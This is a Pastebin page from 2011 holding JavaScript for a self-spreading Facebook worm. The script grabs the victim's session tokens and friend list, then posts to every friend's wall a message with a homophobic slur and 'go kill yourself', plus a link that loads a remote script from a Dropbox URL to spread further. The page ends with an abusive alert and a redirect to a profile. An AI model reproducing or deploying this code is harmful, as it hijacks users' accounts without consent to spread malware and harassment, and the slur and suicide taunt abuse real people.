Advertisement
Guest User

Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below.

a guest
May 12th, 2011
24,426
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.22 KB | None | 0 0
  1. var message = "Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below.";
  2. var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();";
  3. var myText = "Remove This App";
  4.  
  5. var post_form_id = document.getElementsByName('post_form_id')[0].value;
  6. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  7. var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  8.  
  9. var friends = new Array();
  10. gf = new XMLHttpRequest();
  11. gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
  12. gf.send();
  13. if(gf.readyState!=4){ }else{
  14. data = eval('(' + gf.responseText.substr(9) + ')');
  15. if(data.error){ }else{
  16. friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
  17. }
  18. }
  19. for(var i=0; i<friends.length; i++){
  20. var httpwp = new XMLHttpRequest();
  21. var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1";
  22. var paramswp = "&__d=1&app_id=6628568379&extern=0&" +
  23. "&post_form_id=" + post_form_id +
  24. "&fb_dtsg=" + fb_dtsg +
  25. "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
  26. "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
  27. "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
  28. "&user_message=" + message;
  29. httpwp.open("POST", urlwp, true);
  30. httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  31. httpwp.setRequestHeader("Content-length", paramswp.length);
  32. httpwp.setRequestHeader("Connection", "keep-alive");
  33. httpwp.onreadystatechange = function(){
  34. if (httpwp.readyState == 4 && httpwp.status == 200){
  35.  
  36. }
  37. }
  38. httpwp.send(paramswp);
  39. }
  40. alert("Failed to remove. Go fuck yourself with a cactus.");
  41. document.location = "profile.php?id=100000583908715";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement